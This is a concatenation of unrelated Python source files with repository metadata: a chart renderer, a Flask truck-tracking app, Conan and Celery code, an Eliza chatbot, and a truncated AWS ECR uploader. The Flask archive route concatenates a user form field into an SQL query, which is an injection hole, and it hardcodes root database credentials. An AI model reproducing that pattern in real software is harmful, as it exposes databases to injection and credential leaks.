17c67804477d49c14190bfb741a72b7035d9286c | 767 | py | Python | docs/source/renderers/chart_renderer_example.py | steveblamey/django-report-tools | e12fe737a372925c7ce4969ed6e754d51cd9853b | [
"BSD-2-Clause"
] | 33 | 2015-01-30T18:02:10.000Z | 2020-06-11T18:45:08.000Z | docs/source/renderers/chart_renderer_example.py | steveblamey/django-report-tools | e12fe737a372925c7ce4969ed6e754d51cd9853b | [
"BSD-2-Clause"
] | 4 | 2015-01-29T21:00:22.000Z | 2021-06-10T17:40:08.000Z | docs/source/renderers/chart_renderer_example.py | steveblamey/django-report-tools | e12fe737a372925c7ce4969ed6e754d51cd9853b | [
"BSD-2-Clause"
] | 14 | 2015-04-13T10:34:35.000Z | 2020-08-16T18:02:04.000Z | from report_tools.renderers import ChartRenderer
class MyChartRenderer(ChartRenderer):
@classmethod
def render_piechart(cls, chart_id, options, data, renderer_options):
return "<div id='%s' class='placeholder'>Pie Chart</div>" % chart_id
@classmethod
def render_columnchart(cls, chart_id, options, data, renderer_options):
return "<div id='%s' class='placeholder'>Column Chart</div>" % chart_id
@classmethod
def render_barchart(cls, chart_id, options, data, renderer_options):
return "<div id='%s' class='placeholder'>Bar Chart</div>" % chart_id
@classmethod
def render_linechart(cls, chart_id, options, data, renderer_options):
return "<div id='%s' class='placeholder'>Line Chart</div>" % chart_id | 40.368421 | 79 | 0.705346 | 716 | 0.933507 | 0 | 0 | 656 | 0.85528 | 0 | 0 | 204 | 0.265971 |
17c77bdbbbefa5f7c703943e14d06b6e268f555c | 2,849 | py | Python | app.py | lwalkk/truck-website | 81035dfa7ffdafdea162838dfaf82d0a44d2cf16 | [
"MIT"
] | null | null | null | app.py | lwalkk/truck-website | 81035dfa7ffdafdea162838dfaf82d0a44d2cf16 | [
"MIT"
] | null | null | null | app.py | lwalkk/truck-website | 81035dfa7ffdafdea162838dfaf82d0a44d2cf16 | [
"MIT"
] | null | null | null | from flask import Flask, request
from flask import render_template
from flask_mysqldb import MySQL
import TimeCalc
from datetime import datetime, timedelta
app = Flask(__name__)
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'password'
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_DB'] = 'trucks'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
mysql = MySQL(app)
@app.route('/', methods=['GET', 'POST'])
def home():
cur = mysql.connection.cursor()
cur.execute('''SELECT * FROM on_site''')
onSite = cur.fetchall()
cur.execute('SELECT time_in, time_out FROM archive WHERE time_in >= DATE_ADD(NOW(), INTERVAL -12 HOUR);')
prevTimes = cur.fetchall()
wait_times = TimeCalc.CalculateWaitTime(prevTimes, onSite)
i = 0
for row in onSite:
wait = wait_times[i]
hours = (wait-datetime.now()).total_seconds() / 3600
temp_dict = {'wait_time' :wait,'time_remaining': hours}
row.update(temp_dict)
i += 1
return render_template('home.html', data=onSite, wait_times=wait_times, curr_time = datetime.now())
@app.route('/archive/', methods=['POST', 'GET'])
def archive():
cur = mysql.connection.cursor()
if request.method == 'POST':
output = request.form['output']
date= request.form['date']
print('DATE IS ')
print(date)
query = 'SELECT * FROM archive '
andStr = ''
whereStr = 'WHERE '
if date !='ALL':
if date == 'yesterday':
query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -1 DAY) '
elif date == 'lastWeek':
query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -7 DAY) '
elif date == 'last3Month':
query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -90 DAY) '
elif date == 'last6Month':
query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -180 DAY) '
elif date == 'lastYear':
query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -365 DAY) '
andStr = 'AND '
whereStr = ''
location = request.form['location']
if location != 'ALL':
query += andStr + whereStr + 'location=' + "'" + location + "'" + ' '
andStr = 'AND '
whereStr = ''
#company = request.form['company']
# if company != 'ALL':
# query += andStr + 'WHERE company = ' + "'" + company + "'"
query += ';'
print(query)
cur.execute(query)
data = cur.fetchall()
displayMode = request.form['output']
if displayMode == 'screen':
return render_template('archive.html', data=data)
return render_template('archive.html', data=None)
| 27.133333 | 109 | 0.557389 | 0 | 0 | 0 | 0 | 2,445 | 0.858196 | 0 | 0 | 916 | 0.321516 |
17c9aa0e7487d9e67e8f56273b862ff651c5d62b | 233 | py | Python | test/test_children_tree.py | kisliakovsky/structures | 19969470a7e9b150b077082cc8ca0c2fc9be279e | [
"MIT"
] | null | null | null | test/test_children_tree.py | kisliakovsky/structures | 19969470a7e9b150b077082cc8ca0c2fc9be279e | [
"MIT"
] | null | null | null | test/test_children_tree.py | kisliakovsky/structures | 19969470a7e9b150b077082cc8ca0c2fc9be279e | [
"MIT"
] | null | null | null | from unittest import TestCase
from src.tree import ChildrenTree
class TestChildrenTree(TestCase):
def test_height(self):
tree = ChildrenTree(1, [[], [3, 4], [], [], [0, 2]])
self.assertEqual(3, tree.height())
| 21.181818 | 60 | 0.639485 | 165 | 0.708155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
17cb214bdeac8ea001ea137df86d94fab66b5a09 | 5,183 | py | Python | conanfile.py | bincrafters/conan-gtk | bf8056df1294c0b6d894fddf71f8cf6531212aea | [
"MIT"
] | null | null | null | conanfile.py | bincrafters/conan-gtk | bf8056df1294c0b6d894fddf71f8cf6531212aea | [
"MIT"
] | null | null | null | conanfile.py | bincrafters/conan-gtk | bf8056df1294c0b6d894fddf71f8cf6531212aea | [
"MIT"
] | 1 | 2021-09-22T19:02:25.000Z | 2021-09-22T19:02:25.000Z | from conans import ConanFile, Meson, tools
from conans.errors import ConanInvalidConfiguration
import os
class LibnameConan(ConanFile):
name = "gtk"
description = "libraries used for creating graphical user interfaces for applications."
topics = ("conan", "gtk", "widgets")
url = "https://github.com/bincrafters/conan-gtk"
homepage = "https://www.gtk.org"
license = "LGPL-2.1-or-later"
generators = "pkg_config"
settings = "os", "arch", "compiler", "build_type"
options = {
"shared": [True, False],
"fPIC": [True, False],
"with_wayland": [True, False],
"with_x11": [True, False],
"with_pango": [True, False]
}
default_options = {
"shared": True,
"fPIC": True,
"with_wayland": False,
"with_x11": True,
"with_pango": True}
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
if self.settings.os != "Linux":
del self.options.with_wayland
del self.options.with_x11
def build_requirements(self):
self.build_requires("meson/0.56.0")
if not tools.which('pkg-config'):
self.build_requires("pkgconf/1.7.3")
def requirements(self):
self.requires("gdk-pixbuf/2.42.0")
self.requires("glib/2.67.0")
self.requires("cairo/1.17.2")
self.requires("graphene/1.10.2")
if self.settings.os == "Linux":
self.requires("xkbcommon/1.0.3")
if self.options.with_wayland:
self.requires("wayland") # FIXME: Create an actual Wayland package(s)
if self.options.with_x11:
self.requires("xorg/system")
self.requires("libepoxy/1.5.4")
if self.options.with_pango:
self.requires("pango/1.48.0")
def system_requirements(self):
if self.settings.os == 'Linux' and tools.os_info.is_linux:
if tools.os_info.with_apt:
installer = tools.SystemPackageTool()
packages = ['sassc']
for package in packages:
installer.install(package)
def configure(self):
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
if self.settings.os == "Linux":
if self.options.with_wayland or self.options.with_x11:
if not self.options.with_pango:
raise ConanInvalidConfiguration("with_pango option is mandatory when with_wayland or with_x11 is used")
if self.settings.os == "Windows":
raise ConanInvalidConfiguration("GTK recipe is not yet compatible with Windows. Contributions are welcome.")
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = self.name + "-" + self.version
os.rename(extracted_dir, self._source_subfolder)
def _configure_meson(self):
meson = Meson(self)
defs = {}
if self.settings.os == "Linux":
defs["wayland-backend"] = "true" if self.options.with_wayland else "false"
defs["x11-backend"] = "true" if self.options.with_x11 else "false"
defs["introspection"] = "disabled"
defs["documentation"] = "false"
defs["man-pages"] = "false"
defs["build-tests"] = "false"
defs["build-examples"] = "false"
defs["demos"] = "false"
args=[]
args.append("--wrap-mode=nofallback")
meson.configure(defs=defs, build_folder=self._build_subfolder, source_folder=self._source_subfolder, pkg_config_paths=[self.install_folder], args=args)
return meson
def build(self):
with tools.environment_append(tools.RunEnvironment(self).vars):
meson = self._configure_meson()
meson.build()
def package(self):
self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
meson = self._configure_meson()
with tools.environment_append({
"PKG_CONFIG_PATH": self.install_folder,
"PATH": [os.path.join(self.package_folder, "bin")]}):
meson.install()
# If the CMakeLists.txt has a proper install method, the steps below may be redundant
# If so, you can just remove the lines below
include_folder = os.path.join(self._source_subfolder, "include")
self.copy(pattern="*", dst="include", src=include_folder)
self.copy(pattern="*.dll", dst="bin", keep_path=False)
self.copy(pattern="*.lib", dst="lib", keep_path=False)
self.copy(pattern="*.a", dst="lib", keep_path=False)
self.copy(pattern="*.so*", dst="lib", keep_path=False)
self.copy(pattern="*.dylib", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
self.cpp_info.includedirs.append(os.path.join("include", "gtk-4.0"))
self.cpp_info.names["pkg_config"] = "gtk+-3.0"
if self.settings.os == "Macos":
self.cpp_info.frameworks = ["AppKit", "Carbon"]
| 40.492188 | 159 | 0.612001 | 5,075 | 0.979163 | 0 | 0 | 0 | 0 | 0 | 0 | 1,316 | 0.253907 |
17cb5a4e5e188e8afd6b4471951035dcebbec25c | 1,346 | py | Python | Testcase11-Real-world-app-emulation/trace-gen/src/generateActionIATMapping.py | sangroad/ServerlessBench | 5cddf6c7969319c2b02c608bc3866fd781d1417e | [
"MulanPSL-1.0"
] | null | null | null | Testcase11-Real-world-app-emulation/trace-gen/src/generateActionIATMapping.py | sangroad/ServerlessBench | 5cddf6c7969319c2b02c608bc3866fd781d1417e | [
"MulanPSL-1.0"
] | null | null | null | Testcase11-Real-world-app-emulation/trace-gen/src/generateActionIATMapping.py | sangroad/ServerlessBench | 5cddf6c7969319c2b02c608bc3866fd781d1417e | [
"MulanPSL-1.0"
] | null | null | null | # this file is for debug
import os
import yaml
SECONDS_OF_A_DAY = 3600*24
MILLISECONDS_PER_SEC = 1000
config = yaml.load(open(os.path.join(os.path.dirname(__file__),'config.yaml')), yaml.FullLoader)
SAMPLE_NUM = config['sample_number']
workloadDir = "../CSVs/%i" % SAMPLE_NUM
def generateActionIATMapping():
actionFileName = "%s/appComputeInfo.csv" % workloadDir
IATFileName = "%s/possibleIATs.csv" % workloadDir
appAndIATMapFileName = "%s/appandIATMap.csv" % workloadDir
actionIATdict = {}
actionFile = open(actionFileName, "r")
IATFile = open(IATFileName, "r")
outfile = open(appAndIATMapFileName, "w")
outfile.write("appName,IAT,execTime\n")
actionLines = actionFile.readlines()[1:]
IATLines = IATFile.readlines()[1:]
i = 0
appExecTime = 0
prev = ""
for line in actionLines:
splitted = line.split(",")
appName = splitted[0]
execTime = splitted[3]
appExecTime += int(execTime)
if appName == prev:
continue
# actionIATdict[appName] = float(IATLines[i][:-1])
outfile.write("%s,%s,%d\n" % (appName, IATLines[i][:-1], appExecTime))
i += 1
prev = appName
appExecTime = 0
actionFile.close()
IATFile.close()
return actionIATdict
if __name__ == '__main__':
generateActionIATMapping() | 28.638298 | 96 | 0.647845 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 239 | 0.177563 |
17cb6e924dabd28d65570136329686d987bc7e4b | 1,047 | py | Python | electronics/ltspice/rc_lowpass/calc.py | qeedquan/misc_utilities | 94c6363388662ac8ebbf075b9c853ce6defbb5b3 | [
"MIT"
] | 8 | 2018-10-17T18:17:25.000Z | 2022-03-18T09:02:53.000Z | electronics/ltspice/rc_lowpass/calc.py | qeedquan/misc_utilities | 94c6363388662ac8ebbf075b9c853ce6defbb5b3 | [
"MIT"
] | null | null | null | electronics/ltspice/rc_lowpass/calc.py | qeedquan/misc_utilities | 94c6363388662ac8ebbf075b9c853ce6defbb5b3 | [
"MIT"
] | 3 | 2020-07-01T13:52:42.000Z | 2022-03-18T09:10:59.000Z | #!/usr/bin/env python
# http://sim.okawa-denshi.jp/en/CRtool.php
# A RC circuit can act as a low pass filter when fed different AC frequencies if we hook
# them up in a serial way
# We can calculate various values of the filters using the formulas below
from math import *
def cutoff_frequency(R, C):
return 1/(2*pi*R*C)
def risetime(R, C, t0, t1):
return R*C*log(t1/t0)
def print_risetimes():
R = 1e3
C = 1e-7
t = [
[0.1, 0.9],
]
for i in t:
print("R = %f C = %.8f t0 %f t1 %f risetime %f" % (R, C, i[0], i[1], risetime(R, C, i[0], i[1])))
def print_cutoff_frequencies():
R = 1e3
C = 1e-7
# there is one pole for an RC filter, which is negative of the cut off frequency
f = cutoff_frequency(R, C)
p = -f
print("R = %f C = %.8f Cutoff Frequency %f Pole %f" % (R, C, f, p))
# p = 1/RC
# p / (s + p)
def transfer_function(s, R, C):
p = 1 / (R*C)
print(p)
return p / (s + p)
print_risetimes()
print_cutoff_frequencies()
print(transfer_function(1+3j, 1e3, 1e-7))
| 24.348837 | 105 | 0.598854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 438 | 0.418338 |
17cbb18aa49b9a42e1ad5b10fe3c95f49bc72cb1 | 4,860 | py | Python | apps/log_search/tasks/mapping.py | kiritoscs/bk-log | 4801b14182ba7cb108d968cd4f33668ee2d16dbc | [
"MIT"
] | null | null | null | apps/log_search/tasks/mapping.py | kiritoscs/bk-log | 4801b14182ba7cb108d968cd4f33668ee2d16dbc | [
"MIT"
] | null | null | null | apps/log_search/tasks/mapping.py | kiritoscs/bk-log | 4801b14182ba7cb108d968cd4f33668ee2d16dbc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
We undertake not to change the open source license (MIT license) applicable to the current version of
the project delivered to anyone in the future.
"""
from concurrent.futures import ThreadPoolExecutor
from celery.schedules import crontab
from celery.task import periodic_task, task
from apps.log_search.handlers.search.search_handlers_esquery import SearchHandler
from apps.utils.lock import share_lock
from apps.utils.log import logger
from apps.exceptions import ApiResultError
from apps.log_search.constants import BkDataErrorCode
from apps.log_search.models import LogIndexSet
@periodic_task(run_every=crontab(minute="*/10"))
@share_lock()
def sync_index_set_mapping_cache():
logger.info("[sync_index_set_mapping_cache] start")
index_set_id_list = LogIndexSet.objects.filter(is_active=True).values_list("index_set_id", flat=True)
def sync_mapping_cache(index_set_id):
logger.info("[sync_index_set_mapping_cache] index_set({}) start".format(index_set_id))
try:
SearchHandler(index_set_id=index_set_id, search_dict={}).fields()
except Exception as e: # pylint: disable=broad-except
logger.exception("[sync_index_set_mapping_cache] index_set({}) sync failed: {}".format(index_set_id, e))
return
logger.info("[sync_index_set_mapping_cache] index_set({}) sync success".format(index_set_id))
with ThreadPoolExecutor() as executor:
executor.map(sync_mapping_cache, index_set_id_list)
logger.info("[sync_index_set_mapping_cache] end")
@periodic_task(run_every=crontab(minute="0", hour="2"))
def sync_index_set_mapping_snapshot():
logger.info("[sync_index_set_mapping_snapshot] start")
index_set_list = LogIndexSet.objects.filter(is_active=True)
for index_set in index_set_list:
try:
index_set.sync_fields_snapshot(pre_check_enable=False)
except ApiResultError as e:
# 当数据平台返回为无法获取元数据报错情况
if e.code in [BkDataErrorCode.STORAGE_TYPE_ERROR, BkDataErrorCode.COULD_NOT_GET_METADATA_ERROR]:
index_set.is_active = False
index_set.save()
logger.exception(
f"[sync_index_set_mapping_snapshot] index_set({index_set.index_set_id} call mapping error: {e})"
)
continue
except Exception as e: # pylint: disable=broad-except
logger.exception(
"[sync_index_set_mapping_snapshot] index_set({}) sync failed: {}".format(index_set.index_set_id, e)
)
continue
logger.info("[sync_index_set_mapping_snapshot] index_set({}) sync success".format(index_set.index_set_id))
logger.info("[sync_index_set_mapping_snapshot] end")
@task(ignore_result=True)
def sync_single_index_set_mapping_snapshot(index_set_id=None): # pylint: disable=function-name-too-long
try:
index_set_obj = LogIndexSet.objects.get(index_set_id=index_set_id)
except LogIndexSet.DoesNotExist:
logger.exception(f"[sync_single_index_set_mapping_snapshot]index_set({index_set_id}) not exist")
else:
try:
index_set_obj.sync_fields_snapshot()
except Exception as e: # pylint: disable=broad-except
logger.exception(
f"[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync failed: {e}"
)
logger.info(f"[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync success")
| 50.625 | 117 | 0.734156 | 0 | 0 | 0 | 0 | 2,943 | 0.596473 | 0 | 0 | 2,588 | 0.524524 |
17ce1ca456408cd57b564d3fa90a6dbc05eaed30 | 13,700 | py | Python | eliza.py | lucasmelin/eliza | 878ea25f833ccd1cc439ead01c786c920b9bd078 | [
"MIT"
] | null | null | null | eliza.py | lucasmelin/eliza | 878ea25f833ccd1cc439ead01c786c920b9bd078 | [
"MIT"
] | null | null | null | eliza.py | lucasmelin/eliza | 878ea25f833ccd1cc439ead01c786c920b9bd078 | [
"MIT"
] | null | null | null | # https://sites.google.com/view/elizagen-org/the-original-eliza
from dataclasses import dataclass
from typing import List, Pattern
import re
import random
from rich.console import Console
from rich.panel import Panel
from time import sleep
class Eliza:
def __init__(self):
pass
def translate(self, str, table):
words = [table.get(word, word) for word in str.split(" ")]
return " ".join(words)
def respond(self, query):
for topic in topics:
match = topic.statement.match(query)
if match:
response = random.choice(topic.responses)
if "{0}" not in response:
return response
replacements = self.translate(match.group(1), subject)
return response.format(replacements).capitalize()
subject = {
"am": "are",
"was": "were",
"i": "you",
"i'd": "you would",
"i've": "you have",
"i'll": "you will",
"i'm": "you are",
"my": "your",
"are": "am",
"you've": "I have",
"you'll": "I will",
"your": "my",
"yours": "mine",
"you": "me",
"me": "you",
}
@dataclass
class Topic:
statement: Pattern
responses: List[str]
topics = [
Topic(
re.compile(r"I need (.*)", re.IGNORECASE),
[
"Why do you need {0}?",
"Would it really help you to get {0}?",
"Are you sure you need {0}?",
],
),
Topic(
re.compile(r"Why don\'?t you ([^\?]*)\??", re.IGNORECASE),
[
"Do you really think I don't {0}?",
"Perhaps eventually I will {0}.",
"Do you really want me to {0}?",
],
),
Topic(
re.compile(r"Why can\'?t I ([^\?]*)\??", re.IGNORECASE),
[
"Do you think you should be able to {0}?",
"If you could {0}, what would you do?",
"I don't know -- why can't you {0}?",
"Have you really tried?",
],
),
Topic(
re.compile(r"I can\'?t (.*)", re.IGNORECASE),
[
"How do you know you can't {0}?",
"Perhaps you could {0} if you tried.",
"What would it take for you to {0}?",
],
),
Topic(
re.compile(r"I am feeling (.*)", re.IGNORECASE),
[
"Did you come to me because you are {0}?",
"How long have you been {0}?",
"How do you feel about being {0}?",
],
),
Topic(
re.compile(r"I\'?m feeling (.*)", re.IGNORECASE),
[
"How does being {0} make you feel?",
"Do you enjoy being {0}?",
"Why do you tell me you're {0}?",
"Why do you think you're {0}?",
],
),
Topic(
re.compile(r"I am (.*)", re.IGNORECASE),
[
"Did you come to me because you are {0}?",
"How long have you been {0}?",
"How do you feel about being {0}?",
],
),
Topic(
re.compile(r"I\'?m (.*)", re.IGNORECASE),
[
"How does being {0} make you feel?",
"Do you enjoy being {0}?",
"Why do you tell me you're {0}?",
"Why do you think you're {0}?",
],
),
Topic(
re.compile(r"Are you ([^\?]*)\??", re.IGNORECASE),
[
"Why does it matter whether I am {0}?",
"Would you prefer it if I were not {0}?",
"Perhaps you believe I am {0}.",
"I may be {0} -- what do you think?",
"Why are you interested in whether or not I am {0}?",
],
),
Topic(
re.compile(r"What (.*)", re.IGNORECASE),
[
"Why do you ask?",
"How would an answer to that help you?",
"What do you think?",
],
),
Topic(
re.compile(r"How (.*)", re.IGNORECASE),
[
"How do you suppose?",
"Perhaps you can answer your own question.",
"What is it you're really asking?",
],
),
Topic(
re.compile(r"Because (.*)", re.IGNORECASE),
[
"Is that the real reason?",
"What other reasons come to mind?",
"Does that reason apply to anything else?",
"If {0}, what else must be true?",
],
),
Topic(
re.compile(r"(.*) sorry (.*)", re.IGNORECASE),
[
"There are many times when no apology is needed.",
"What feelings do you have when you apologize?",
"Please don't apologize.",
],
),
Topic(
re.compile(r"Hello(.*)", re.IGNORECASE),
[
"Hello... I'm glad you could drop by today.",
"Hi there... how are you today?",
"Hello, how are you feeling today?",
],
),
Topic(
re.compile(r"I think (.*)", re.IGNORECASE),
["Do you doubt {0}?", "Do you really think so?", "But you're not sure {0}?"],
),
Topic(
re.compile(r"(.*) friend (.*)", re.IGNORECASE),
[
"Tell me more about your friends.",
"When you think of a friend, what comes to mind?",
"Why don't you tell me about a childhood friend?",
],
),
Topic(
re.compile(r"Yes", re.IGNORECASE),
["You seem quite sure.", "OK, but can you elaborate a bit?"],
),
Topic(
re.compile(r"(.*) computer(.*)", re.IGNORECASE),
[
"Are you really talking about me?",
"Does it seem strange to talk to a computer?",
"How do computers make you feel?",
"Do you feel threatened by computers?",
"Do computers worry you?",
],
),
Topic(
re.compile(r"Is it (.*)", re.IGNORECASE),
[
"Do you think it is {0}?",
"Perhaps it's {0} -- what do you think?",
"If it were {0}, what would you do?",
"It could well be that {0}.",
],
),
Topic(
re.compile(r"It is (.*)", re.IGNORECASE),
[
"You seem very certain.",
"If I told you that it probably isn't {0}, what would you feel?",
],
),
Topic(
re.compile(r"Can you ([^\?]*)\??", re.IGNORECASE),
[
"What makes you think I can't {0}?",
"If I could {0}, then what?",
"Why do you ask if I can {0}?",
],
),
Topic(
re.compile(r"Can I ([^\?]*)\??", re.IGNORECASE),
[
"Perhaps you don't want to {0}.",
"Do you want to be able to {0}?",
"If you could {0}, would you?",
],
),
Topic(
re.compile(r"You are (.*)", re.IGNORECASE),
[
"Why do you think I am {0}?",
"Does it please you to think that I'm {0}?",
"Perhaps you would like me to be {0}.",
"Perhaps you're really talking about yourself?",
],
),
Topic(
re.compile(r"You\'?re (.*)", re.IGNORECASE),
[
"Why do you say I am {0}?",
"Why do you think I am {0}?",
"Are we talking about you, or me?",
],
),
Topic(
re.compile(r"I don\'?t (.*)", re.IGNORECASE),
["Don't you really {0}?", "Why don't you {0}?", "Do you want to {0}?"],
),
Topic(
re.compile(r"I feel (.*)", re.IGNORECASE),
[
"Good, tell me more about these feelings.",
"Do you often feel {0}?",
"When do you usually feel {0}?",
"When you feel {0}, what do you do?",
],
),
Topic(
re.compile(r"I have (.*)", re.IGNORECASE),
[
"Why do you tell me that you've {0}?",
"Have you really {0}?",
"Now that you have {0}, what will you do next?",
],
),
Topic(
re.compile(r"I would (.*)", re.IGNORECASE),
[
"Could you explain why you would {0}?",
"Why would you {0}?",
"Who else knows that you would {0}?",
],
),
Topic(
re.compile(r"Is there (.*)", re.IGNORECASE),
[
"Do you think there is {0}?",
"It's likely that there is {0}.",
"Would you like there to be {0}?",
],
),
Topic(
re.compile(r"My (.*)", re.IGNORECASE),
[
"I see, your {0}.",
"Why do you say that your {0}?",
"When your {0}, how do you feel?",
],
),
Topic(
re.compile(r"You (.*)", re.IGNORECASE),
[
"We should be discussing you, not me.",
"Why do you say that about me?",
"Why do you care whether I {0}?",
],
),
Topic(
re.compile(r"Why (.*)", re.IGNORECASE),
["Why don't you tell me the reason why {0}?", "Why do you think {0}?"],
),
Topic(
re.compile(r"I want (.*)", re.IGNORECASE),
[
"What would it mean to you if you got {0}?",
"Why do you want {0}?",
"What would you do if you got {0}?",
"If you got {0}, then what would you do?",
],
),
Topic(
re.compile(r"(.*) mother(.*)", re.IGNORECASE),
[
"Tell me more about your mother.",
"What was your relationship with your mother like?",
"How do you feel about your mother?",
"How does this relate to your feelings today?",
"Good family relations are important.",
],
),
Topic(
re.compile(r"(.*) father(.*)", re.IGNORECASE),
[
"Tell me more about your father.",
"How did your father make you feel?",
"How do you feel about your father?",
"Does your relationship with your father relate to your feelings today?",
"Do you have trouble showing affection with your family?",
],
),
Topic(
re.compile(r"(.*) brother(.*)", re.IGNORECASE),
[
"Tell me more about your brother.",
"What was your relationship with your brother like?",
"How do you feel about your brother?",
"How does this relate to your feelings today?",
"Good family relations are important.",
],
),
Topic(
re.compile(r"(.*) sister(.*)", re.IGNORECASE),
[
"Tell me more about your sister.",
"How did your sister make you feel?",
"How do you feel about your sister?",
"Does your relationship with your sister relate to your feelings today?",
"Do you have trouble showing affection with your family?",
],
),
Topic(
re.compile(r"(.*) child(.*)", re.IGNORECASE),
[
"Did you have close friends as a child?",
"What is your favorite childhood memory?",
"Do you remember any dreams or nightmares from childhood?",
"Did the other children sometimes tease you?",
"How do you think your childhood experiences relate to your feelings today?",
],
),
Topic(
re.compile(r"(.*) I remember (.*)", re.IGNORECASE),
[
"Does thinking of that bring anything else to mind?",
"What reminded you of that just now?",
],
),
Topic(
re.compile(r"(.*) always (.*)", re.IGNORECASE),
[
"Can you think of a specific instance?",
"Really -- always?",
],
),
Topic(
re.compile(r"(.*)\?", re.IGNORECASE),
[
"Why do you ask that?",
"Please consider whether you can answer your own question.",
"Perhaps the answer lies within yourself?",
"Why don't you tell me?",
],
),
Topic(
re.compile(r"quit", re.IGNORECASE),
[
"Thank you for talking with me.",
"Good-bye.",
"Thank you, have a good day!",
],
),
Topic(
re.compile(r"(.*)", re.IGNORECASE),
[
"Please tell me more.",
"Let's change focus a bit... Tell me about your family.",
"Can you elaborate on that?",
"Why do you say that {0}?",
"I see.",
"Very interesting.",
"{0}.",
"I see. And what does that tell you?",
"How does that make you feel?",
"How do you feel when you say that?",
"Go on.",
],
),
]
def format_statement(statement):
s = statement.rstrip("!.")
return s.lower()
def eliza_say(console, statement, typing_min=1, typing_max=3, color="green"):
with console.status(f"[bold {color}]Eliza is typing...", spinner="point"):
typing_time = random.uniform(typing_min, typing_max)
sleep(typing_time)
console.print(f"[bold {color}]{statement}")
def program():
console = Console()
console.print("[light_green]Eliza", justify="center", style="bold")
panel = Panel('[orange1]Talk to Eliza by typing in plain English, using normal upper and lower-case letters and punctuation. Enter "quit" when done.')
console.print(panel)
eliza_say(console, "Hello, I am Eliza. How are you feeling today?")
s = ""
therapist = Eliza()
while s != "quit":
try:
s = input("> ")
s = format_statement(s)
# This Exception is raised with Ctrl+Z
except EOFError:
s = "quit"
print(s)
eliza_say(console, therapist.respond(s))
#print(therapist.respond(s))
if __name__ == "__main__":
program()
| 30.37694 | 154 | 0.480803 | 649 | 0.047372 | 0 | 0 | 71 | 0.005182 | 0 | 0 | 6,689 | 0.488248 |
17cf03e398e39d203c9ebbce60b6f35bd144eb35 | 5,110 | py | Python | aws_artifact_copy/services/ecr.py | schlarpc/aws-artifact-copy | cd8a57db3f6e4636dc6f18b3f5b9534c907f9371 | [
"MIT"
] | null | null | null | aws_artifact_copy/services/ecr.py | schlarpc/aws-artifact-copy | cd8a57db3f6e4636dc6f18b3f5b9534c907f9371 | [
"MIT"
] | null | null | null | aws_artifact_copy/services/ecr.py | schlarpc/aws-artifact-copy | cd8a57db3f6e4636dc6f18b3f5b9534c907f9371 | [
"MIT"
] | null | null | null | import argparse
import hashlib
import json
import os
import sys
import tarfile
import trio
from ..common.botocore import (
create_async_session,
create_async_client,
partial_client_methods,
)
from ..common.serialization import json_dumps_canonical
async def upload_file(ecr, limit, fctx) -> str:
async with limit:
with fctx as f:
upload_config = await ecr.initiate_layer_upload()
first_byte = 0
hasher = hashlib.sha256()
while chunk := f.read(upload_config["partSize"]):
await ecr.upload_layer_part(
uploadId=upload_config["uploadId"],
partFirstByte=first_byte,
partLastByte=first_byte + len(chunk) - 1,
layerPartBlob=chunk,
)
first_byte = first_byte + len(chunk)
hasher.update(chunk)
digest = f"sha256:{hasher.hexdigest()}"
try:
await ecr.complete_layer_upload(
uploadId=upload_config["uploadId"],
layerDigests=[digest],
)
except ecr.exceptions.LayerAlreadyExistsException:
# pushed from another process running concurrently, maybe?
pass
return digest
async def find_missing_layers(ecr, digests: list[str]) -> frozenset[str]:
response = await ecr.batch_check_layer_availability(
layerDigests=digests,
)
available_digests = frozenset(
layer["layerDigest"]
for layer in response["layers"]
if layer["layerAvailability"] == "AVAILABLE"
)
return frozenset(digests) - available_digests
def parse_original_manifest(stream):
manifest = json.load(stream)[0]
yield {
"path": manifest["Config"],
# HACK assumption about streamLayeredImage format
"digest": f"sha256:{manifest['Config'].split('.')[0]}",
}
for layer in manifest["Layers"]:
yield {
"path": layer,
# HACK assumption about streamLayeredImage format
"digest": f"sha256:{layer.split('/')[-2]}",
}
async def upload_image(args: argparse.Namespace) -> str:
async with create_async_client("ecr") as ecr_unwrapped:
ecr = partial_client_methods(ecr_unwrapped, repositoryName=args.repository_name)
with tarfile.open(args.source) as tf:
